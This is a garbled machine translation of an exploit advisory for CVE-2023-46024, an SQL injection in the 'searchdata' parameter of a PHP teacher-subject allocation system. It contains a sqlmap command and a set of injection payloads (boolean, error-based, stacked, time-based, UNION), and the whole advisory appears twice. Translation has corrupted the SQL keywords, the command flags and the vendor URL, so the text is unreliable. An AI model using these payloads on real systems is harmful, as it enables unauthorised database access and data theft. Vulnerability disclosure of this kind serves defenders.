#利用标题:教师主题分配管理系统1.0-'SearchData'Sqli
#日期: 2023-11-15
#利用作者: Ersin Erenler
#供应商homepage3360 https://phpgurukul.com/teacher-subject-poction-antocation-system-system-system-php-and-mysql
#软件link: https://phpgurukul.com/?sdm_process_download=1download_id=17645
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46024
----------------------------------------------------------------------------------------------------------------------------
#Description:
教师主题分配管理系统v1.0容易受到严重的安全漏洞,这是由于对index.php文件中的“ searchData”参数的保护不足。该缺陷可能会被利用以注入恶意的SQL查询,从而导致未经授权的访问和从数据库中提取敏感信息。
脆弱的文件: /index.php
参数名称: SearchData
#概念证明:
--------------------------------------
使用“ searchData”参数执行SQLMAP来检索当前数据库:
sqlmap -u'http://localhost/tsas' - method post -data'searchdata=testsearch='-p searchdata -lisk 3 - level 3 -dbms mysql -batch -batch -current -db -current -db
SQLMAP响应:
--------------------------------------
---
参数: SearchData(POST)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: searchdata=test%'和3912=3912和'qxhv%'='qxhvsearch='
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,按子句(floor)
payload: searchData=test%'和(从(选择1043)(选择count(*),contat(0x7170706a71)
type:堆叠查询
title: mysql=5.0.12堆叠查询(注释)
PAYLOAD: SEARCHDATA=test%';选择睡眠(5)#search=
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: searchData=test%'和(从(select(sleep(5)))gqzt)和'wylu%'='wylusearch='wylusearch='
type:联合查询
title:通用联盟查询(NULL)-15列
payload: searchdata=test%'联合全部选择Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Concat(0x7170706a7) 1,0x784e7a47626a794a74456975444444c5a4C647345564556464658476E75684C4716F617373724B6B6B6B6B6B6B6B6A685163,0X71717A7A7878787878171) - 搜索
---
#日期: 2023-11-15
#利用作者: Ersin Erenler
#供应商homepage3360 https://phpgurukul.com/teacher-subject-poction-antocation-system-system-system-php-and-mysql
#软件link: https://phpgurukul.com/?sdm_process_download=1download_id=17645
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46024
----------------------------------------------------------------------------------------------------------------------------
#Description:
教师主题分配管理系统v1.0容易受到严重的安全漏洞,这是由于对index.php文件中的“ searchData”参数的保护不足。该缺陷可能会被利用以注入恶意的SQL查询,从而导致未经授权的访问和从数据库中提取敏感信息。
脆弱的文件: /index.php
参数名称: SearchData
#概念证明:
--------------------------------------
使用“ searchData”参数执行SQLMAP来检索当前数据库:
sqlmap -u'http://localhost/tsas' - method post -data'searchdata=testsearch='-p searchdata -lisk 3 - level 3 -dbms mysql -batch -batch -current -db -current -db
SQLMAP响应:
--------------------------------------
---
参数: SearchData(POST)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: searchdata=test%'和3912=3912和'qxhv%'='qxhvsearch='
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,按子句(floor)
payload: searchData=test%'和(从(选择1043)(选择count(*),contat(0x7170706a71)
type:堆叠查询
title: mysql=5.0.12堆叠查询(注释)
PAYLOAD: SEARCHDATA=test%';选择睡眠(5)#search=
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: searchData=test%'和(从(select(sleep(5)))gqzt)和'wylu%'='wylusearch='wylusearch='
type:联合查询
title:通用联盟查询(NULL)-15列
payload: searchdata=test%'联合全部选择Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Concat(0x7170706a7) 1,0x784e7a47626a794a74456975444444c5a4C647345564556464658476E75684C4716F617373724B6B6B6B6B6B6B6B6A685163,0X71717A7A7878787878171) - 搜索
---